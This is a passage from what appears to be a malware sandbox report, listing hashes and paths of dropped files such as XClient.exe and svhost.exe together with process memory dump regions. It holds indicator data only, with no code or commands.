        c4dc98993ad98aa8e9816aa920837a33

        SHA1

        6dd767f37f7944ff81d513e2dcd1000d66d9034a

        SHA256

        b850af4e9b8fcf818c7990561ceaaee818c79ff1381c93f664a3d4d8d563b4a2

        SHA512

        9453520499658b3e999109753ba078f57fb936fd7a8e4887d9bbe1200c18b7ec3f8403d2b7e895f1712984fa84f7bad9203aa527a8fbe08c04e5d1d24ba4495d

      • C:\Users\Admin\AppData\Roaming\XClient.exe

        Filesize

        40KB

        MD5

        ca1be8c146c1ab7796b13d29da6f3d78

        SHA1

        19b723f654ea15ae44d850a2abf5e65fc2a8e8f1

        SHA256

        1bbe7516f47fd001ab57a168210d8a99a22438e4d65f0cf8a85f2b2c26ff59b5

        SHA512

        c23ef4ed12ce33f3253e53d22758c49cab18953cf10b9e89c860537050682c2602251e69de0336fb7d37b061ac7bcccfbebdc7090d5b47ee5c8368a02472cf4a

      • C:\Users\Admin\AppData\Roaming\svhost.exe

        Filesize

        42KB

        MD5

        8f07bf27150c3a39dce213aa1e646e6a

        SHA1

        02130a4626dfe194db890fd4eeb5b02679a1f8c0

        SHA256

        cc38042dcb39ab32ad8f8cebea17a5694c079de704211ba8955bc5edf4c2268c

        SHA512

        2d7e266a9e25cee05a8af2c9893570828dc2ddc7f7c972b37edee4d4c95198291a7a09643fc944cebbc8d1ac6dde27a29af12abb69253eec1836eef0cdfc9c05

      • memory/208-34-0x000001B4F2190000-0x000001B4F21B2000-memory.dmp

        Filesize

        136KB

      • memory/428-126-0x00007FF94C4F0000-0x00007FF94C524000-memory.dmp

        Filesize

        208KB

      • memory/428-129-0x00007FF935FC0000-0x00007FF9360CE000-memory.dmp

        Filesize

        1.1MB

      • memory/428-128-0x00000293ACF90000-0x00000293AE040000-memory.dmp

        Filesize

        16.7MB

      • memory/428-127-0x00007FF938390000-0x00007FF938646000-memory.dmp

        Filesize

        2.7MB

      • memory/428-125-0x00007FF7ACDD0000-0x00007FF7ACEC8000-memory.dmp

        Filesize

        992KB

      • memory/752-112-0x00007FF94C7D0000-0x00007FF94C7E1000-memory.dmp

        Filesize

        68KB

      • memory/752-110-0x00007FF950CD0000-0x00007FF950CE8000-memory.dmp

        Filesize

        96KB

      • memory/752-111-0x00007FF94C950000-0x00007FF94C967000-memory.dmp

        Filesize

        92KB

      • memory/752-108-0x00007FF94C4F0000-0x00007FF94C524000-memory.dmp

        Filesize

        208KB

      • memory/752-107-0x00007FF7ACDD0000-0x00007FF7ACEC8000-memory.dmp

        Filesize

        992KB

      • memory/752-109-0x00007FF938390000-0x00007FF938646000-memory.dmp

        Filesize

        2.7MB

      • memory/2088-0-0x00007FF9462A3000-0x00007FF9462A5000-memory.dmp

        Filesize

        8KB

      • memory/2088-1-0x0000000000160000-0x000000000017E000-memory.dmp

        Filesize

        120KB

      • memory/3272-29-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-101-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-28-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3272-26-0x0000000000850000-0x0000000000860000-memory.dmp

        Filesize

        64KB

      • memory/4632-103-0x00000000010C0000-0x00000000010CC000-memory.dmp

        Filesize

        48KB

      • memory/4632-102-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/4632-100-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/4632-30-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/4632-27-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/4632-137-0x00007FF9462A0000-0x00007FF946D61000-memory.dmp

        Filesize

        10.8MB

      • memory/4632-25-0x00000000008F0000-0x0000000000900000-memory.dmp

        Filesize

        64KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.